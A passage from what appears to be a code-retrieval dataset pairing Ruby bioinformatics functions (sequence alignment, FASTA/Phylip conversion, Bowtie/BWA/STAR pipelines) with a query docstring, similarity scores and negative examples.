= cartographer.find_trails_between_nodes(graph, start_node, end_node, options[:graph_search_leash_length], start_node_forward)\n log.info \"Found #{trails.length} trail(s) between the initial and terminal nodes\"\n\n# log.info \"Reading kmer abundances from #{options[:kmer_multiple_abundance_file]}..\"\n# kmer_hash = Bio::KmerMultipleAbundanceHash.parse_from_file options[:kmer_multiple_abundance_file]\n# log.info \"Finished reading the kmer abundances\"\n\n# if options[:trail_kmer_coverage_file]\n# log.info \"Writing out kmer coverages to #{options[:trail_kmer_coverage_file]}..\"\n# writer = Bio::AssemblyGraphAlgorithms::KmerCoverageWriter.new\n# io = File.open(options[:trail_kmer_coverage_file],'w')\n# writer.write(io, trails, kmer_hash)\n# log.info \"Finished writing\"\n# end\n\n# log.info \"Filtering trail(s) based on kmer coverage, requiring each kmer in the path to have a minimum of #{options[:kmer_path_filter_min_coverage]} coverage in patterned reads, except for the #{options[:kmer_path_end_exclusion_length]}bp at the ends\"\n# kmer_path_filter = Bio::AssemblyGraphAlgorithms::KmerCoverageBasedPathFilter.new\n# thresholds = desired_pattern.collect{|c| c == true ? 1 : 0}\n# log.info \"Using thresholds for filtering: #{thresholds}\"\n# trails = kmer_path_filter.filter(trails, kmer_hash, thresholds, :exclude_ending_length => options[:kmer_path_end_exclusion_length])\n# log.info \"After filtering remained #{trails.length} trails\"\n\n printer = Bio::AssemblyGraphAlgorithms::ContigPrinter.new\n trails.each_with_index do |trail, i|\n log.debug \"Before attachment to the contig, sequence of the trail was #{trail.sequence}\" if log.debug?\n acon = Bio::AssemblyGraphAlgorithms::ContigPrinter::AnchoredConnection.new\n acon.start_probe_read_id = 1\n acon.end_probe_read_id = 2\n acon.start_probe_node = start_node\n acon.end_probe_node = end_node\n acon.start_probe_contig_offset = options[:contig_end_length]\n acon.end_probe_contig_offset = options[:contig_end_length]\n acon.paths = [trail]\n log.debug \"AnchoredConnection object to print for this trail: #{acon.inspect}\" if log.debug?\n\n puts \">trail#{i+1}\"\n puts printer.one_connection_between_two_contigs(\n finishm_graph.graph,\n probe_sequences[0],\n acon,\n probe_sequences[1])\n end\n end",
"def cleanup_distances!\n r = get_result(:distances)\n ref = project.datasets.select(&:ref?).select(&:active?).map(&:name)\n return if r.nil?\n\n %i[haai_db aai_db ani_db].each do |db_type|\n db = r.file_path(db_type)\n next if db.nil? || !File.size?(db)\n\n sqlite_db = SQLite3::Database.new db\n table = db_type[-6..-4]\n val = sqlite_db.execute \"select seq2 from #{table}\"\n next if val.empty?\n\n (val.map(&:first) - ref).each do |extra|\n sqlite_db.execute \"delete from #{table} where seq2=?\", extra\n end\n end\n end",
"def test_match_reference\n parser = CEdictParser.new(Rails.root.join(\"data/cedict/test_data/cedict_parser_match_reference.txt\").to_s)\n entries = parser.run\n assert_equal(6,entries.count)\n assert_equal(1,parser.reference_only_entries.count)\n \n merged_entries = parser.merge_references_into_base_entries(entries,parser.reference_only_entries)\n assert_equal(6,merged_entries.count)\n end",
"def alignment_strings(start=0,stop=self.length,organisms=nil) \n answer = Array.new \n self.genomic_aligns.each do |contig|\n if organisms.nil? # if no organisms were specified to limit the results\n sequence = contig.aligned_sequence(start,stop)\n answer << Bio::FastaFormat.new(Bio::Sequence::NA.new(sequence).to_fasta(contig.find_organism.name)) unless sequence.nil?\n else\n if organisms.include?(contig.find_organism)\n sequence = contig.aligned_sequence(start,stop)\n answer << Bio::FastaFormat.new(Bio::Sequence::NA.new(sequence).to_fasta(contig.find_organism.name))\n end\n end \n end\n return answer \n end",
"def query_align(seqs)\n seqtype = nil\n unless seqs.is_a?(Bio::Alignment)\n seqs = Bio::Alignment.new(seqs)\n end\n seqs.each do |s|\n if s.is_a?(Bio::Sequence::AA) then\n seqtype = 'PROTEIN'\n elsif s.is_a?(Bio::Sequence::NA) then\n seqtype = 'DNA'\n end\n break if seqtype\n end\n query_string(seqs.to_fasta(70, :avoid_same_name => true), seqtype)\n end",
"def phylipstring_to_fastastring(phystr)\n ph=Bio::Phylip::PhylipFormat.new(phystr)\n return ph.alignment.output(:fasta) #output_fasta\n\n end",
"def initialize(seq_name,seq_fasta,seq_qual, seq_comment = '')\n super\n\n @actions = []\n @seq_fasta_orig = seq_fasta\n @seq_fasta = seq_fasta\n \n @seq_qual_orig = seq_qual\n @seq_qual = seq_qual \n \n @insert_start = 0\n @insert_end = seq_fasta.length-1 \n \n @stats={}\n @comments=[]\n \n @file_tags=[]\n \n # for paired ends\n @order_in_tuple=0\n @tuple_id=0\n @tuple_size=0\n @file_tag_tuple_priority=0\n \n end",
"def obtain_target_from_seq(bioseq_seq)\r\n #we are going to keep all the targets from each gene,\r\n #hash of hashes :)\r\n targets=Hash.new\r\n len_bioseq = bioseq_seq.length + 1\r\n nstrand_targets = []\r\n pstrand_targets = []\r\n for i in (0..bioseq_seq.length-5)\r\n if bioseq_seq.complement[i..i+5] == \"cttctt\"\r\n nstrand_targets << [i,i+5]\r\n end\r\n if bioseq_seq[i..i+5] == \"cttctt\"\r\n pstrand_targets << [i,i+5]\r\n end\r\n end\r\n #im going to obtein the exon sites\r\n bioseq_seq.features.each do |feature|\r\n position = feature.position\r\n #not remote entries\r\n next unless (feature.feature == 'exon' ) && (not position =~ /[A-Z]/)\r\n exon_id = feature.qualifiers[0].value.gsub('exon_id=', '')\r\n #we can find exons in the the complement or the postive strand, so the way for obtaining the data is different\r\n #i wanna keep the strand forward or reverse\r\n if position =~/complement/\r\n exon_site_negative=position.tr('complement()',\"\")\r\n aux=exon_site_negative =~ /\\./ \r\n #we have to change the start and final point, the ebi documentation shows --> x..y, y is the start point and x is the final point\r\n #location 1 --> l1 \r\n #location 2 --> l2\r\n l1= len_bioseq - exon_site_negative[0,aux].to_i\r\n l2= len_bioseq - exon_site_negative[aux+2,exon_site_negative.length].to_i\r\n exon_site_negative=[l2,l1] # they are the location of the exons\r\n #we are going to check if the target that we did before is in the exon site\r\n is_inside_exon = check_target_in_exon(exon_id,nstrand_targets,'reverse',len_bioseq,exon_site_negative)\r\n #is_inside_exon will be a hash with positions, exon_id and the strand for the gff file\r\n unless is_inside_exon.nil? #if the hash is not nil i could keep it in other hash\r\n targets = targets.merge(is_inside_exon)\r\n end\r\n else\r\n exon_site_positive=position\r\n aux=exon_site_positive =~ /\\./ \r\n l1= exon_site_positive[0,aux].to_i\r\n l2= exon_site_positive[aux+2,exon_site_positive.length].to_i\r\n exon_site_positive=[l1,l2]\r\n is_inside_exon = check_target_in_exon(exon_id,pstrand_targets,'forward',len_bioseq,exon_site_positive)\r\n #is_inside_exon will be a hash with positions, exon_id and the strand for the gff file\r\n unless is_inside_exon.nil? #if the hash is not nil i could keep it in other hash\r\n targets = targets.merge(is_inside_exon)\r\n end\r\n end\r\n end\r\n return targets\r\nend",
"def run_score\n filename = self.generate_fasta_alignment_file\n string = \"./lib/score_mac #{filename} temp_data/#{self.alignment_name}_res.txt temp_data/#{self.alignment_name}_dif.txt temp_data/#{self.alignment_name}_alignments.txt\"\n puts string\n if system(string)\n \n end\n end",
"def genome_from_path(kmers_a)\n <<-DOC\n String Spelled by a Genome Path Problem. Reconstruct a string from its genome path.\n Input: A sequence of k-mers Pattern1, … ,Patternn such that the last k - 1 symbols of Patterni are\n equal to the first k-1 symbols of Patterni+1 for 1 ≤ i ≤ n-1.\n Output: A string Text of length k+n-1 such that the i-th k-mer in Text is equal to Patterni (for 1 ≤ i ≤ n). \n \n Input: [\"TAA\", \"AAT\", \"ATG\"]\n Output: TAATG\n DOC\n # If we assign the first kmer to the genome and keep on adding the last character from all the next kmers we\n # should get the string\n genome = kmers_a.shift # shift will remove first element from array and returns it\n kmers_a.each do |kmer|\n genome += kmer[-1]\n end\n return genome\n end",
"def find_probes(indexed_bam_file, contig_names_positions_directions, kmer, path_to_cny_unified_seq_names_file)\n # need to check the sequence of the aligned read is the same as what is in the cny_unified_seq_names_file\n end",
"def fetch_unaligned_sequences \n answer = Array.new \n self.genomic_aligns.each do |piece| \n sequence = piece.get_slice.seq\n fas = Bio::FastaFormat.new(Bio::Sequence::NA.new(sequence).to_fasta(piece.genomic_align_id))\n answer.push(fas) \n end \n return answer \n end",
"def bowtie_map1(bowtie_index, input_file, input_format, output_file)\n\t\tif input_format == 'fasta'\n\t\t\tstdin, stdout, stderr, t = Open3.popen3(\"bowtie2 -x #{bowtie_index} -f -U #{input_file} | samtools view -bS - > #{output_file}\")\n\t\telse\n\t\t\tstdin, stdout, stderr, t = Open3.popen3(\"bowtie2 -x #{bowtie_index} -q -U #{input_file} | samtools view -bS - > #{output_file}\")\n\t\tend\n\t\tsystem_exitcode(t, stderr, 'Bowtie2')\n\tend",
"def getFtsLoc\n location = ARGV[1]\n loc = location.split(\"..\")\n protId = \"\"\n @gbkObj.each_cds do |ft|\n ftH = ft.to_hash\n ftloc = ft.locations\n if ftloc[0].from == loc[0].to_i && ftloc[0].to == loc[1].to_i\n gene = []\n product = []\n gene = ftH[\"gene\"] if !ftH[\"gene\"].nil?\n product = ftH[\"product\"] if !ftH[\"product\"].nil?\n protId = ftH[\"protein_id\"][0] if !ftH[\"protein_id\"].nil?\n location = \"c#{location}\" if ftloc[0].strand == -1\n dna = getDna(ft,@gbkObj.to_biosequence)\n seqout = dna.output_fasta(\"#{@accession}|#{location}|#{protId}|#{gene[0]}|#{product[0]}\",60)\n puts seqout\n end\n end\n end",
"def full_ref # rubocop:disable Metrics/AbcSize\n @full_ref ||= begin\n ref = \"#{refparts[:perfix]}#{refparts[:series]} #{refparts[:code]}\"\n ref += \"pt#{refparts[:prt]}\" if refparts[:prt] # long_to_short(refparts, \"prt\").to_s\n ref += \"ver#{refparts[:ver]}\" if refparts[:ver] # long_to_short(refparts, \"vol\").to_s\n ref += \"v#{refparts[:vol]}\" if refparts[:vol]\n ref\n end\n end",
"def fastafile_to_fastastring(filename)\n oa = Bio::Alignment::OriginalAlignment.new()\n #load sequences from file\n Bio::FlatFile.open(Bio::FastaFormat, filename) { |ff|\n #store sequence from file\n ff.each_entry { |x| oa.add_seq(x.seq,x.entry_id) }\n }\n return oa.output(:fasta)\n\n end",
"def configure_ait_files(opts, outdir, basename, overwrite = true)\n opts.ais_file = File.join(outdir, \"#{basename}.ais\") unless (!overwrite && opts.ais_file)\n opts.apx_file = File.join(outdir, \"#{basename}.apx\") unless (!overwrite && opts.apx_file)\n opts.ait_report_prefix = File.join(outdir, \"#{basename}.ait\") unless (!overwrite && opts.ait_report_prefix)\n end"
] |
[
"0.5709553",
"0.5528572",
"0.54516274",
"0.5200783",
"0.51840615",
"0.5138118",
"0.50645435",
"0.49660274",
"0.49483785",
"0.4883737",
"0.4859847",
"0.48551404",
"0.483638",
"0.48274213",
"0.48274213",
"0.4795258",
"0.47941756",
"0.47817165",
"0.47717196",
"0.47586805",
"0.47520122",
"0.47222647",
"0.47182214",
"0.47016332",
"0.46906725",
"0.465728",
"0.4655251",
"0.46336532",
"0.46320567",
"0.45995995",
"0.45899546",
"0.45894632",
"0.45891798",
"0.45884538",
"0.45767465",
"0.455392",
"0.45505938",
"0.45490134",
"0.4528653",
"0.44981432",
"0.44944483",
"0.44931188",
"0.44728354",
"0.4470433",
"0.4470433",
"0.44606498",
"0.4458022",
"0.44564378",
"0.4451278",
"0.4447133",
"0.44364277",
"0.44345927",
"0.44256362",
"0.44127494",
"0.44116235",
"0.44082177",
"0.43828672",
"0.4352269",
"0.43313202",
"0.43293563",
"0.43262148",
"0.4309739",
"0.43086615",
"0.43072268",
"0.4286442",
"0.42857653",
"0.428278",
"0.42762342",
"0.42666113",
"0.4255603",
"0.42349142",
"0.42328137",
"0.42106482",
"0.42013866",
"0.41942203",
"0.4187699",
"0.41876844",
"0.41835877",
"0.41709915",
"0.41585913",
"0.41578072",
"0.41520926",
"0.41367128",
"0.41289008",
"0.41169852",
"0.41144508",
"0.41055977",
"0.41055113",
"0.41045964",
"0.40800577",
"0.4079905",
"0.40762144",
"0.40757382",
"0.40755254",
"0.40736452",
"0.40707695",
"0.406904",
"0.40625408",
"0.40461174",
"0.40405852"
] |
0.7185728
|
0
|
Performs alignment to ncRNA reference; only unaligned reads will be processed further
|
def compute
index(@ref, @ref_base, @software)
align(@ref, @ref_base, @software, {seedlen: @seedlen})
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def process_alignment\n # init vars\n @names = []\n @seqs = []\n \n @alignment = \"-B #{@basename}.aln\"\n\n # import alignment file\n @content = IO.readlines(@infile).map {|line| line.chomp}\n \n #check alignment for gap-only columns\n remove_inserts\n \n #write query-file\n File.open(@infile, \"w\") do |file|\n file.write(\">#{@names[0]}\\n\")\n file.write(\"#{@seqs[0]}\\n\")\n end\n \n #write aln-file\n File.open(@basename + \".aln\", \"w\") do |file|\n @names.each_index do |num|\n file.write(\"Sequence#{num} \")\n file.write(\" \") if (num < 10)\n file.write(\" \") if (num < 100)\n file.write(\"#{@seqs[num]}\\n\")\n end\n end\n end",
"def align!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 32 )\n\n type = ALIGN\n channel = ANTLR3::DEFAULT_CHANNEL\n\n \n # - - - - main rule block - - - -\n # at line 362:8: 'align'\n match( \"align\" )\n\n \n @state.type = type\n @state.channel = channel\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 32 )\n\n end",
"def align(ref, ref_base, software, opts = {})\n if software == :tophat\n bt_flag =\n opts[:tophat_aligner] == :bowtie1 ? '--bowtie1' : ''\n gap_flag =\n opts[:mismatches] < 2 ? \"--read-gap-length #{opts[:mismatches]}\" : ''\n end\n\n aln_cmd = {\n bowtie1:\n 'bowtie' \\\n \" --seedlen=#{opts[:seedlen]} #{ref_base}\" \\\n \" --un=#{@names.get('fp')}\" \\\n \" -q #{@names.get('trim')} \" \\\n \" --sam #{@names.get('ncrna')}\",\n bowtie2:\n 'bowtie2' \\\n \" --un #{@names.get('fp')}\" \\\n \" -x #{ref_base}\" \\\n \" -L #{opts[:seedlen]}\" \\\n \" -U #{@names.get('trim')}\" \\\n \" -S #{@names.get('ncrna')}\",\n bwa:\n 'bwa mem' \\\n \" -k #{opts[:seedlen]}\" \\\n \" #{ref} \" \\\n \" #{@names.get('trim')} \" \\\n \"| samtools view -b - > #{@names.get('ncrna')} \" \\\n '&& bam2fastq' \\\n \" -o #{@names.get('fp')}\" \\\n \" --no-aligned #{@names.get('ncrna')}\",\n tophat:\n 'tophat' \\\n \" --read-edit-dist #{opts[:mismatches]}\" \\\n \" #{bt_flag}\" \\\n \" -N #{opts[:mismatches]}\" \\\n \" --output-dir #{@names.get('topout')}\" \\\n ' --no-novel-juncs' \\\n \" #{gap_flag}\" \\\n \" --GTF #{opts[:annotation]}\" \\\n \" #{ref_base} #{@names.get('fp')}\",\n star:\n 'STAR' \\\n \" --genomeDir #{ref_base}\" \\\n \" --outFilterMismatchNmax #{opts[:mismatches]}\" \\\n \" --readFilesIn #{@names.get('fp')}\"\\\n \" --outFileNamePrefix #{@names.get('mapped_all')}\"\n }\n\n target =\n opts[:seedlen].nil? ? @names.get('mapped_all') : @names.get('fp')\n run_cmd(aln_cmd[software]) unless skip_step?(target, 'aligning')\n [@names.get('mapped_all'), @names.get('unmapped')]\n end",
"def unbucketized_alignment\n align(\n @ref, @ref_base, @software,\n { annotation: @annotation,\n tophat_aligner: @tophat_aligner,\n mismatches: @mismatches\n }\n )\n mapped_all = @software == :star ? \\\n @names.get('mapped_all_star') : @names.get('mapped_all')\n run_cmd(\"cp #{mapped_all} #{@names.get('mapped_merged')}\")\n unless @software == :star\n run_cmd(\n \"cp #{@names.get('unmapped')} #{@names.get('unmapped_merged')}\"\n )\n end\n @max_mismatches = @mismatches\n end",
"def alignment_node(node); end",
"def bucketized_alignment\n # split reads into buckets according to their size and err_rate\n @buckets = bucketize(@err_rate)\n\n # perform alignment on each bucket\n @buckets.reverse_each do |lower, upper, mismatches|\n @names.set_bucket(lower, upper)\n mapped, unmapped = align(\n @ref, @ref_base, @software,\n { annotation: @annotation,\n tophat_aligner: @tophat_aligner,\n mismatches: mismatches\n }\n )\n @mapped_bams << mapped\n @unmapped_bams << unmapped\n @max_mismatches = [@max_mismatches, mismatches].max\n end\n\n # merge alignments\n @names.unset_bucket\n unbucketize(@mapped_bams, @names.get('mapped_merged'))\n unbucketize(@unmapped_bams, @names.get('unmapped_merged'))\n end",
"def convert_alignment(args={})\n i, o = args[:in], args[:out]\n \n ff = Bio::FlatFile.auto(i).to_a\n aln = Bio::Alignment.new(ff)\n File.open(o, 'w') do |o|\n o.write aln.output :phylip\n end\n \nend",
"def run_align_assess\n filename = self.generate_fasta_alignment_file_for_all\n string = \"./lib/AlignAssess_wShorterID #{filename} P\"\n seq_array = Array.new\n if system(string)\n seq_id_array = self.sequences.map{|s| s.seq_id}\n new_filename = filename + \"_assess\"\n f = File.new(new_filename, \"r\")\n flag = false\n read_row= 999999999\n cur_row = 0\n while (line = f.gets)\n if cur_row > read_row && flag\n if line == \"\\n\"\n flag =false\n else\n seq_array << line.split(\"\\t\")\n end\n elsif line == \"Pair-wise %ID over shorter sequence:\\n\"\n flag=true\n read_row = cur_row + 2\n end\n cur_row +=1\n end\n range = seq_array.length - 1\n #seq_array.each do |row|\n for row_num in 0..range\n for i in 1..range#(row_num) \n PercentIdentity.first_or_create(:seq1_id=>seq_id_array[row_num],\n :seq2_id=>seq_id_array[i],\n :alignment_name => self.alignment_name,\n :percent_id=>seq_array[row_num][i])\n # print \"[#{row_num}:#{i-1}=>#{row[i]}],\"\n end\n #print \"\\n\"\n end\n end\n end",
"def aligned_sequence(start=0,stop = nil,noindent=false) \n self._get_aligned_sequence_from_original_sequence_and_cigar_line\n #seq = AlignSeq.new(self.get_slice.seq,self.cigar_line,start,stop).align\n #return Bio::FastaFormat.new(Bio::Sequence::NA.new(seq).to_fasta(\"#{self.find_organism}\"))\n end",
"def align\n @genome = Genome.find(params[:id])\n @proteins = Protein.all\n @method = params[:method]\n\n if params[:method] == 'local'\n @message = 'Local alignment'\n align_all_local\n elsif params[:method] == 'global'\n @message = 'Global alignment'\n align_all_global\n end\n\n end",
"def align\n unless defined?(@align); parse_align; end\n @align\n end",
"def align\n unless defined?(@align); parse_align; end\n @align\n end",
"def aligned_sequence \n peptide_member = Ensembl::Compara::Member.find_by_member_id(self.peptide_member_id)\n seq = peptide_member.sequence.sequence\n return nil if seq.nil?\n aln = Ensembl::Compara::AlignSeq.new(seq,self.cigar_line).align\n return Bio::FastaFormat.new(Bio::Sequence::NA.new(aln).to_fasta(\"#{self.member.stable_id}|#{peptide_member.stable_id}\")) \n end",
"def query_align(seqs)\n seqtype = nil\n unless seqs.is_a?(Bio::Alignment)\n seqs = Bio::Alignment.new(seqs)\n end\n seqs.each do |s|\n if s.is_a?(Bio::Sequence::AA) then\n seqtype = 'PROTEIN'\n elsif s.is_a?(Bio::Sequence::NA) then\n seqtype = 'DNA'\n end\n break if seqtype\n end\n query_string(seqs.to_fasta(70, :avoid_same_name => true), seqtype)\n end",
"def align_pairwise(bioseqs, opt={})\n factory = Bio::ClustalW.new\n clustal_opts = hash_opts_to_clustalopts(opt)\n factory.options = clustal_opts\n template = bioseqs.shift\n start_length = []\n pairwise_aligns = bioseqs.map do |bseq|\n clust_al = clustal_align([template, bseq], factory)\n cl_cons = clust_al.consensus\n aligned_string = clust_al[1].to_s\n #(st, len) = find_good_section(aligned_string, opt[:fidelity_length])\n seq_to_use = \n if opt[:consensus_fidelity]\n cl_cons\n else\n aligned_string\n end\n (st, len) = find_good_section(seq_to_use, opt[:fidelity_length])\n if st\n pristine = aligned_string[st, len].gsub('-','') # pristine read (ends removed)\n clustal_align([template.to_s, Bio::Sequence::NA.new(pristine)], factory)\n else\n warn \"a sequence does not meeting min fidelity! using original alignment\" \n clust_al\n end\n\n end\n end",
"def query_align(seqs, *arg)\n unless seqs.is_a?(Bio::Alignment)\n seqs = Bio::Alignment.new(seqs, *arg)\n end\n query_string(seqs.to_fasta(70))\n end",
"def sub_alignment _value=0\n send_cmd(\"sub_alignment #{_value}\")\n end",
"def align\n [:owner, :group, :size].each do |field|\n current = @alignment[field]\n @buffer.each do |line|\n new = line[field].length\n current = new if current < new\n end\n @alignment[field] = current\n end\n end",
"def generate_alignment\n raise ArgumentError, 'Missing genome FASTA file.' unless @genome_file\n raise ArgumentError, 'Missing transcripts FASTA file.' unless @transcripts_file\n \n # Prepare the BLAT alignment\n blat = Alignment::BLAT.new(@blat_options.merge({ out_format: :tab, database: @genome_file }))\n \n # Optionally set a permanent file to write the results to\n @alignment_file ||= \"#{@transcripts_file}.alignment\"\n blat.output_file = @alignment_file\n \n puts \"Running BLAT alignment...\" if @verbose\n \n # Run\n result_file = blat.run(@transcripts_file)\n result_file.path\n end",
"def process_bam(input_file, fasta, skip)\n\n\t\t# general settings\n\t\texclude = []\n\t\tFile.open(skip, 'r').readlines.each {|line| exclude << line.strip}\n\t\tfirstline = TRUE \n\t\tanchor_left = nil\n\t\tanchor_right = nil\n\t\tchr_a = nil\n\t\tchr_b = nil\n\t\tinput_hash = {}\n\n\t\t# Initiate chromosome hash\n\t\tDir.foreach(fasta) do |item|\n\t\t\tchr = item.sub('.fa', '')\n\t\t\tnext if item == '.' || item == '..' || exclude.include?(chr) \n\t\t\tinput_hash[chr] = {}\n\t\tend\n\n\t\tinput_hash.each_key do |chr_a|\n\t\t\tinput_hash.keys.each {|chr_b| input_hash[chr_a][chr_b] = []}\n\t\tend\n\n\t\t# read bam file\n\t\tinput_file.each do |line|\n\t\t\tline = line.strip.split(/\\s+/)\n\t\t\n\t\t\tif firstline \n\t\t\t\tanchor_left = ReadBam.new(line)\n\t\t\t\tfirstline = FALSE\n\t\t\t\tchr_a = anchor_left.chr\n\t\t\telse\n\t\t\t\tanchor_right = ReadBam.new(line)\n\t\t\t\tchr_b = anchor_right.chr\n\t\t\t\t\n\t\t\t\tif input_hash.has_key?(chr_a) && interChimeric?(anchor_left, anchor_right, exclude)\n\t\t\t\t\t\n\t\t\t\t\tif anchor_left.strand == 1 && anchor_right.strand == 1\n\t\t\t\t\t\tinput_hash[chr_b][chr_a] << [anchor_right, anchor_left] \n\t\t\t\t\telsif anchor_left.strand == -1 && anchor_right.strand == -1\n\t\t\t\t\t\tinput_hash[chr_a][chr_b] << [anchor_left, anchor_right] \n\t\t\t\t\telse\n\t\t\t\t\t\tinput_hash[chr_b][chr_a] << [anchor_right, anchor_left] \n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\t\t\n\t\t\t\tanchor_left, anchor_right = nil\n\t\t\t\tfirstline = TRUE\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Found anchor pairs.\"\t\t\n\t\tinput_hash\n\tend",
"def warp_aligned\n \n align = params[:align]\n append = params[:append]\n destmap = Map.find(params[:destmap])\n\n if destmap.status.nil? or destmap.status == :unloaded or destmap.status == :loading\n flash.now[:notice] = t('.no_destination')\n redirect_to :action => \"show\", :id=> params[:destmap]\n elsif align != \"other\"\n\n if params[:align_type] == \"original\"\n destmap.align_with_original(params[:srcmap], align, append )\n else\n destmap.align_with_warped(params[:srcmap], align, append )\n end\n flash.now[:notice] = t('.success')\n redirect_to :action => \"warp\", :id => destmap.id\n else\n flash.now[:notice] = t('.unknown_alignment')\n redirect_to :action => \"align\", :id=> params[:srcmap]\n end\n end",
"def align=(_arg0); end",
"def alignment\n fetch('dnd.alignments')\n end",
"def compute\n index(@ref, @ref_base, @software, @annotation)\n\n if @err_rate > 0\n bucketized_alignment\n else # software == :star || err_rate == 0\n unbucketized_alignment\n end\n end",
"def fasta2anchors(input_file, anchor_length, sequencing_type, output_file)\n\t\tcounter = -1\n\t\tname, mate, seq = nil, nil, nil\n\t\t\n\t\tFile.open(output_file, 'w') do |output|\t\n\t\t\tFile.open(input_file, 'r').each do |line|\n\t\t\t\tcounter += 1\n\t\t\t\t\n\t\t\t\tif counter % 2 == 0\n\t\t\t\t\tif sequencing_type == 'se'\n\t\t\t\t\t\tname, mate = line.strip.match(/(?<=\\>)(\\S*)/).to_s, 1\n\t\t\t\t\telse\n\t\t\t\t\t\tname, mate = line.strip.match(/(?<=\\>)(\\S*)/).to_s.split('/')\n\t\t\t\t\tend\n\t\t\t\telsif counter % 2 == 1\n\t\t\t\t\tseq = line.strip\t\n\n\t\t\t\t\tname_A = \"#{name}_#{mate}_#{seq}_A\"\n\t\t\t\t\tname_B = \"#{name}_#{mate}_#{seq}_B\"\n\t\t\t\t\t\n\t\t\t\t\tseq_A = seq[0..anchor_length - 1]\n\t\t\t\t\tseq_B = seq[-anchor_length..-1]\n\n\t\t\t\t\toutput.puts [\">#{name_A}\", seq_A, \">#{name_B}\", seq_B].join(\"\\n\")\n\t\t\t\t\tname, mate, seq = nil, nil, nil\n\t\t\t\t\tcounter = -1\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\tend",
"def fasta2anchors(input_file, anchor_length, sequencing_type, output_file)\n\t\tcounter = -1\n\t\tname, mate, seq = nil, nil, nil\n\t\t\n\t\tFile.open(output_file, 'w') do |output|\t\n\t\t\tFile.open(input_file, 'r').each do |line|\n\t\t\t\tcounter += 1\n\t\t\t\t\n\t\t\t\tif counter % 2 == 0\n\t\t\t\t\tif sequencing_type == 'se'\n\t\t\t\t\t\tname, mate = line.strip.match(/(?<=\\>)(\\S*)/).to_s, 1\n\t\t\t\t\telse\n\t\t\t\t\t\tname, mate = line.strip.match(/(?<=\\>)(\\S*)/).to_s.split('/')\n\t\t\t\t\tend\n\t\t\t\telsif counter % 2 == 1\n\t\t\t\t\tseq = line.strip\t\n\n\t\t\t\t\tname_A = \"#{name}_#{mate}_#{seq}_A\"\n\t\t\t\t\tname_B = \"#{name}_#{mate}_#{seq}_B\"\n\t\t\t\t\t\n\t\t\t\t\tseq_A = seq[0..anchor_length - 1]\n\t\t\t\t\tseq_B = seq[-anchor_length..-1]\n\n\t\t\t\t\toutput.puts [\">#{name_A}\", seq_A, \">#{name_B}\", seq_B].join(\"\\n\")\n\t\t\t\t\tname, mate, seq = nil, nil, nil\n\t\t\t\t\tcounter = -1\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\tend",
"def msa_replace_random(dir,msa_orig_file,seqs_rand_file,msa_rand_file)\n\n\n rs=PValues::RandomSequences.new\n\n\n #all files in same directory\n msa_orig = dir + msa_orig_file\n seqs_rand = dir + seqs_rand_file\n msa_rand = dir + msa_rand_file\n\n\n rs.gen_random_seqs(msa_orig,seqs_rand)\n\n parser = UqamDoc::Parsers.new\n seqs = parser.fastafile_to_fastastring(seqs_rand)\n\n #align\n maf = UqamDoc::Mafft.new #cw2=UqamDoc::ClustalW2.new\n job_id = maf.submit_dna(seqs) #job_id= cw2.submit_dna(seqs)\n #recuperate\n fasta_str = maf.get_msa_wait(job_id) #fasta_str = cw2.get_msa_wait(job_id)\n #puts fasta_str\n\n\n parser.string_to_file(fasta_str,msa_rand)\n\n\n\n\n\n\n end",
"def phylipstring_to_fastastring(phystr)\n ph=Bio::Phylip::PhylipFormat.new(phystr)\n return ph.alignment.output(:fasta) #output_fasta\n\n end",
"def fetch_unaligned_sequences \n answer = Array.new \n self.genomic_aligns.each do |piece| \n sequence = piece.get_slice.seq\n fas = Bio::FastaFormat.new(Bio::Sequence::NA.new(sequence).to_fasta(piece.genomic_align_id))\n answer.push(fas) \n end \n return answer \n end",
"def align \n return @raw.align \n end",
"def test_alignment_works_in_single_thread\n assert_nothing_raised(\"Can't handle single threaded scenario\") do\n SEQUENCE_GROUPS[0..10].each do |sequence_group|\n align_group(sequence_group)\n end\n end\n end",
"def process()\n # For lanes that don't need alignment, run post run and exit\n if @reference.eql?(\"sequence\")\n puts \"No alignment to perform since reference is \\\"sequence\\\"\"\n puts \"Running postrun script\"\n runPostRunCmd(\"\")\n exit 0\n end\n\n outputFile1 = @sequenceFiles[0] + \".sai\"\n\n alnCmd1 = buildAlignCommand(@sequenceFiles[0], outputFile1) \n obj1 = Scheduler.new(@fcAndLane + \"_aln_Read1\", alnCmd1)\n obj1.setMemory(@maxMemory)\n obj1.setNodeCores(@cpuCores)\n obj1.setPriority(@priority)\n obj1.runCommand()\n alnJobID1 = obj1.getJobName()\n\n # paired end flowcell\n if @isFragment == false\n outputFile2 = @sequenceFiles[1] + \".sai\"\n alnCmd2 = buildAlignCommand(@sequenceFiles[1], outputFile2)\n obj2 = Scheduler.new(@fcAndLane + \"_aln_Read2\", alnCmd2)\n obj2.setMemory(@maxMemory)\n obj2.setNodeCores(@cpuCores)\n obj2.setPriority(@priority)\n obj2.runCommand()\n alnJobID2 = obj2.getJobName()\n\n sampeCmd = buildSampeCommand(outputFile1, outputFile2, @sequenceFiles[0],\n @sequenceFiles[1])\n obj3 = Scheduler.new(@fcAndLane + \"_sampe\", sampeCmd)\n obj3.setMemory(@lessMemory)\n obj3.setNodeCores(@minCpuCores)\n obj3.setPriority(@priority)\n obj3.setDependency(alnJobID1)\n obj3.setDependency(alnJobID2)\n obj3.runCommand()\n makeSamJobName = obj3.getJobName()\n else\n # Flowcell is fragment\n samseCmd = buildSamseCommand(outputFile1, @sequenceFiles[0])\n obj3 = Scheduler.new(@fcAndLane + \"_samse\", samseCmd)\n obj3.setMemory(@lessMemory)\n obj3.setNodeCores(@minCpuCores)\n obj3.setPriority(@priority)\n obj3.setDependency(alnJobID1)\n obj3.runCommand()\n makeSamJobName = obj3.getJobName()\n end\n\n # Sort a BAM\n sortBamCmd = sortBamCommand()\n obj5 = Scheduler.new(@fcAndLane + \"_sortBam\", sortBamCmd)\n obj5.setMemory(@lessMemory)\n obj5.setNodeCores(@minCpuCores)\n obj5.setPriority(@priority)\n obj5.setDependency(makeSamJobName)\n 